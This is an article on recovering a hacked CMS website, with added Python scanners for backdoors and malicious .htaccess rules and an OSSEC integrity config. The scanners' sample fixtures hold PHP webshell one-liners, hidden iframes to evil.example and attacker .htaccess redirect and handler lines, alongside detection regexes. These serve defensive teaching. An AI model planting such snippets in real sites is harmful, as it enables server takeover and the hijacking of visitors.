
Recuperating From a Hacked Website

PCQ Bureau


Sufyan bin Uzayr, Freelance Writer, Graphic Artist, Photographer, www.sufyan.co.nr.

If you have built a website, you have most likely used a CMS of your choice and loaded it with themes, extensions and plugins to extend its functionality. You have created articles, images and other content, all to your heart's content. The cache plugins are in place, you have taken every step you could think of to keep your databases in order, and your traffic is growing as we speak. All in all, you have put together an excellent website, one that will surely make anyone jealous!


However, one fine day you try to visit your site, only to find that it is gone, or that your domain now points to some other website full of advertisements and objectionable content. In a moment of panic you try to log in to the admin back-end, but the passwords have been changed, or the back-end is no longer reachable at all.



Yes, you guessed it right — your website has been hacked!



What now? Security measures help, but at times malicious hackers get the better of us anyway. When your site has been hacked, there are a few steps you can take to minimize the damage.


To begin with, accept that the attackers have already succeeded, and that panicking will only make things worse. Stay calm: a website is dear to anyone who has worked on it, but acting in haste will only increase the damage.



Start with a local scan



There is a real chance that the machine you use to administer your website is itself infected with a virus or trojan; a keylogger or credential stealer on the administrator's PC is a common way for FTP and CMS passwords to leak in the first place. Perform a full system scan of your computer before you do anything else, so that the new passwords you are about to set are not stolen as well. Also, basic as it sounds, keep your anti-virus software updated.


Change passwords



Next, change every password associated with your website, and do it from the machine you have just verified is clean. If, for example, you run Drupal, changing only the Drupal administrator password is not enough: change the passwords for cPanel and/or Plesk (or whatever administrative panel your host provides), FTP, the database users, SSH, and any other credentials the site uses, such as API keys stored in the CMS configuration. Where your host supports it, switch from FTP to SFTP so the new credentials are not sent in the clear. Also review the user list in the CMS for accounts you did not create; attackers commonly add an administrator of their own so that they can get back in after the original password is changed.



Contact your Web host



How much help you get depends on the service you have purchased. If you are on a VPS or a reseller plan, your host will probably provide some assistance, though it is not obliged to supply backups unless its terms of service say so. If you are on a shared hosting package (a reseller package is shared hosting too, technically speaking), your host's first priority will be to stop the malware spreading to the other websites on that server. Believe it or not, most hosts will save their servers first and worry about you second; business is business, after all.

Do check with your host, though, that what you are seeing is really an intrusion and not a server problem on their side. Ask what they have recorded: web access and FTP logs from around the time of the attack show how the attacker got in, and you need to know that before you can be confident a rebuilt site will stay clean. Many hosts also keep backups of their clients' data, so they may be able to help you restore your website.





Backup, with caution



Whatever the way in, whether a phished or stolen password or a vulnerable plugin, assume that the attackers have left backdoors and other loopholes in your website files. Such additions are hard to locate, and a single one that you miss lets them straight back in. Your best bet is to delete all the files and start over from fresh copies of the CMS, themes and plugins, though for minor attacks you can attempt surgical repair. The database is usually worth keeping, but it is not automatically safe: attackers also inject script and iframe tags into stored posts and templates, and add administrator accounts of their own. Export it with a tool such as phpMyAdmin, inspect the export for such content, and only then import it into the new installation.



Surgical repair



More often than not, surgical repair of a hacked website will not work, because you can only remove what you have managed to find. However, if you know the type of infection or attack your website has suffered, you can focus on that particular attack. For example, if you know that the problem lies in certain PHP files of your CMS, compare them against the same files from a fresh download of the same CMS version and look up the documentation for ways to repair them. Typical tells of a backdoor are a PHP file sitting in the uploads directory, a file whose modification time does not match the rest of the release, and code such as eval(base64_decode(...)) or a shell command built from request parameters, which legitimate CMS code does not use.
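What that search looks like in practice, as an added example that is not from the article: a scanner over a web root and a phpMyAdmin-style SQL export that flags the constructs PHP backdoors rely on, PHP code hiding in files that should not contain any, and the hidden iframes and external script tags injected into stored content. The sample tree, dump and indicator list are constructed for the demo, and the patterns are well-known tells rather than a complete signature set, so treat each hit as something to read, not as proof.

```python
"""Indicator scan for a compromised CMS install (added example, not from the
article): flags constructs that PHP backdoors rely on, PHP code in non-PHP
files, and markup injected into stored content. Not exhaustive; a CDN script
tag is legitimate, so every hit still needs a human look."""
import os
import re
import tempfile

REQ = r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER)"   # PHP superglobals carrying attacker input

# Constructs that legitimate CMS code almost never needs but webshells rely on.
PHP_INDICATORS = [
    ("eval-of-decoded-blob", re.compile(
        r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(", re.I)),
    ("eval-of-request-input", re.compile(r"\beval\s*\(.*" + REQ, re.I)),
    ("preg_replace-e-modifier", re.compile(
        r"preg_replace\s*\(\s*(['\"])/.*?/[a-z]*e[a-z]*\1", re.I)),
    ("request-input-called-as-function", re.compile(REQ + r"\s*\[[^\]]*\]\s*\(")),
    ("shell-command-from-request", re.compile(
        r"\b(?:system|passthru|shell_exec|exec|popen|proc_open|assert|create_function)\s*\(.*"
        + REQ, re.I)),
    ("long-base64-literal", re.compile(r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]")),
]

# Markup that gets injected into posts, templates and footers.
MARKUP_INDICATORS = [
    ("hidden-iframe", re.compile(
        r"<iframe[^>]*(?:(?:width|height)\s*=\s*['\"]?0\b|display\s*:\s*none|visibility\s*:\s*hidden)",
        re.I)),
    ("script-from-external-host", re.compile(r"<script[^>]+src\s*=\s*['\"]?(?:https?:)?//", re.I)),
]

PHP_EXT = {".php", ".phtml", ".php5", ".php7", ".inc", ".phar"}


def scan_text(text, source, indicators):
    """Return (source, line_no, indicator) for every line matching an indicator."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for name, rx in indicators:
            if rx.search(line):
                hits.append((source, line_no, name))
    return hits


def scan_file(path, root):
    rel = os.path.relpath(path, root).replace(os.sep, "/")
    ext = os.path.splitext(path)[1].lower()
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    hits = []
    if ext in PHP_EXT:
        hits += scan_text(text, rel, PHP_INDICATORS)
    elif "<?php" in text.lower():
        # PHP code inside an image, .txt or other non-PHP file is never legitimate.
        hits.append((rel, 1, "php-code-in-non-php-file"))
        hits += scan_text(text, rel, PHP_INDICATORS)
    hits += scan_text(text, rel, MARKUP_INDICATORS)
    return hits


def scan_tree(root):
    """Walk a web root (or an unpacked backup) and collect every hit."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            hits += scan_file(os.path.join(dirpath, name), root)
    return sorted(hits)


# Constructed sample: a tiny web root plus a database export, with two planted
# backdoors, one injected iframe in a theme file and one in a stored post.
SAMPLE_FILES = {
    "index.php": "<?php\nrequire __DIR__ . '/wp-blog-header.php';\n",
    "wp-content/uploads/.cache.php": "<?php\n@eval(base64_decode($_POST['c']));\n",
    "wp-content/uploads/logo.jpg": "JFIF<?php system($_GET['cmd']); ?>",
    "wp-content/themes/t/footer.php":
        "</footer>\n<iframe src=\"http://evil.example/x\" width=\"0\" height=\"0\"></iframe>\n",
}
SAMPLE_DUMP = (
    "INSERT INTO wp_posts VALUES (1, 'Hello', '<p>Welcome</p>');\n"
    "INSERT INTO wp_posts VALUES (2, 'About', '<p>Team</p>"
    "<iframe src=\"http://evil.example/x\" style=\"display:none\"></iframe>');\n"
)


def scan_samples():
    """Write the sample tree to a temp dir, scan it and the dump, return all hits."""
    with tempfile.TemporaryDirectory() as root:
        for rel, content in SAMPLE_FILES.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(content)
        hits = scan_tree(root)
    return hits + scan_text(SAMPLE_DUMP, "db-dump", MARKUP_INDICATORS)


if __name__ == "__main__":
    for source, line_no, name in scan_samples():
        print(f"{source}:{line_no}: {name}")
```

Run it as-is to see the planted hits; on a real site point scan_tree at the web root (or an unpacked backup) and feed the phpMyAdmin export to scan_text. Clean index.php produces nothing, which is the point: the signal is in what differs from a stock install.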



.htaccess file



If your domain redirects to a malicious website, the .htaccess file is one of the first places to look, though an injected PHP or JavaScript file, or hijacked DNS at your registrar, can produce the same symptom. Look for rewrite or redirect rules near the end of the file, since most (not all) hackers append their code at the bottom, often after a long run of blank lines so that it sits below the visible part of the file in an editor. Rules that redirect only visitors arriving from a search engine or with a particular user agent are a classic sign, because the owner who types the address in directly never sees the redirect. Compare the file against the one your CMS generates, or against a backup from before the incident, and check the .htaccess files in subdirectories as well, not just the one in the web root. Also ensure that the file's permissions are set to 644.
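An added example (not from the article) of that inspection done mechanically: it parses the file, follows each RewriteCond chain into the RewriteRule that consumes it, and reports redirects to any host other than the site's own, marking those that fire only on referrer, user agent, address or cookie as cloaked. It also flags two other .htaccess tricks worth knowing: auto_prepend_file set via php_value, which makes every PHP request silently include an attacker's file, and a PHP handler added for image extensions, which turns an uploaded "image" into a webshell. OUR_HOST and the sample file are assumptions made for the demo.

```python
"""Audit an Apache .htaccess for the redirect and handler tricks used on hacked
sites (added example, not from the article). Follows RewriteCond/RewriteRule
chains, Redirect* and ErrorDocument; reports targets on any host other than
ours; flags php_value auto_prepend_file and PHP handlers for non-PHP
extensions. OUR_HOST and SAMPLE_HTACCESS are assumed values."""
from urllib.parse import urlparse

OUR_HOST = "example.com"   # assumption: the site's own hostname

# RewriteCond variables attackers key on so the site owner never sees the redirect.
CLOAK_VARS = {"%{HTTP_REFERER}", "%{HTTP_USER_AGENT}", "%{REMOTE_ADDR}", "%{HTTP_COOKIE}"}
REDIRECT_DIRECTIVES = {"redirect", "redirectmatch", "redirectpermanent", "redirecttemp"}


def external_host(target, our_host):
    """Hostname of target if it points off-site, else None ('-' and bare paths give None)."""
    if target.startswith("//"):
        target = "http:" + target
    host = (urlparse(target).hostname or "").lower()
    if host and host != our_host and not host.endswith("." + our_host):
        return host
    return None


def audit_htaccess(text, our_host=OUR_HOST):
    """Return (line_no, kind, detail) for every suspicious directive, in file order."""
    findings = []
    conds = []   # RewriteCond variables accumulate until the next RewriteRule consumes them
    for line_no, raw in enumerate(text.splitlines(), 1):
        parts = raw.split()
        if not parts or parts[0].startswith("#"):
            continue
        directive, args = parts[0].lower(), parts[1:]
        if directive == "rewritecond" and args:
            conds.append(args[0].upper())
        elif directive == "rewriterule" and len(args) >= 2:
            host = external_host(args[1], our_host)
            cloak = sorted(c for c in conds if c in CLOAK_VARS)
            conds = []
            if host and cloak:
                findings.append((line_no, "cloaked-external-redirect",
                                 f"{host} when {', '.join(cloak)}"))
            elif host:
                findings.append((line_no, "external-redirect", host))
        elif directive in REDIRECT_DIRECTIVES and args:
            host = external_host(args[-1], our_host)
            if host:
                findings.append((line_no, "external-redirect", host))
        elif directive == "errordocument" and len(args) >= 2:
            host = external_host(args[1], our_host)
            if host:
                findings.append((line_no, "external-error-page", host))
        elif (directive in ("php_value", "php_flag") and args
              and args[0].lower() in ("auto_prepend_file", "auto_append_file")):
            # every PHP request silently includes the named file: a favourite backdoor hook
            findings.append((line_no, "php-prepend-append-hook", " ".join(args)))
        elif directive in ("addhandler", "addtype") and "php" in raw.lower():
            # makes e.g. .jpg execute as PHP, so an "image" upload becomes a webshell
            exts = [a for a in args[1:] if not a.startswith(".php")]
            if exts:
                findings.append((line_no, "php-handler-for-non-php-extension", " ".join(exts)))
    return findings


# Constructed sample: the stock WordPress block followed, after a run of blank
# lines, by the attacker's additions at the bottom of the file.
SAMPLE_HTACCESS = """\
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress



RewriteCond %{HTTP_REFERER} (google|bing|yahoo)\\. [NC]
RewriteRule ^(.*)$ http://pharma.example/landing?$1 [R=302,L]
ErrorDocument 404 http://pharma.example/404
AddType application/x-httpd-php .jpg
"""

if __name__ == "__main__":
    for line_no, kind, detail in audit_htaccess(SAMPLE_HTACCESS):
        print(f"line {line_no}: {kind}: {detail}")
```

The stock WordPress rules produce nothing; the three appended lines each produce a finding. Set OUR_HOST to the site's real hostname before running it on a live file, otherwise legitimate redirects to your own www subdomain would be reported too.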



Re-install and restore



If you are restoring from a backup, make sure that the backup is clean. Backups generated by online tools and stored on the same server as your website cannot be called safe, for two reasons: an attacker who controls the server can modify or delete them, and any backup taken after the intrusion contains the backdoors too. So keep backups off-site, keep several generations so that you can go back to one from before the compromise, and before you restore, compare the backup's files against a fresh copy of the same CMS release to see exactly what differs.



Security check



Once you have re-installed your website, to be on the safer side, check its security. OSSEC (http://www.ossec.net/) is an open source host-based intrusion detection system; installed on the server, it monitors files for changes and watches the logs, so you learn of the next modification to your web root when it happens rather than when visitors start complaining. Sucuri (http://www.sucuri.net) offers a remote website scanner that checks your pages for known malware and for blacklisting by search engines. Neither replaces fixing the way the attacker got in: if the vulnerable plugin or the leaked password is still there, the site will simply be hacked again.
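A minimal file-integrity (syscheck) configuration for OSSEC, as an added example rather than anything from the article. The element names and attributes are OSSEC's own; the directory paths are assumptions for a typical Linux web server and will differ on yours.

```xml
<ossec_config>
  <syscheck>
    <!-- full integrity scan every 6 hours; realtime alerts need inotify support (Linux) -->
    <frequency>21600</frequency>
    <!-- web root: hash everything, alert on new files, include a diff of changed text files.
         Paths below are assumptions for the example. -->
    <directories check_all="yes" realtime="yes" report_changes="yes">/var/www</directories>
    <directories check_all="yes">/etc/apache2,/etc/php</directories>
    <alert_new_files>yes</alert_new_files>
    <!-- caches and logs churn constantly and would drown the real alerts -->
    <ignore>/var/www/html/wp-content/cache</ignore>
    <ignore type="sregex">\.log$</ignore>
  </syscheck>
</ossec_config>
```

The new-file alert is the one that matters most after an incident: a PHP file appearing in an uploads directory, or .htaccess changing when you did not touch it, is exactly what the scan above would have caught earlier.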



After following the above steps, your website will be up and running once again. Thereafter, make it a point to keep off-site backups and to update the CMS, themes and plugins promptly, since out-of-date extensions and weak passwords are among the most common ways in. After all, prevention is better than cure!
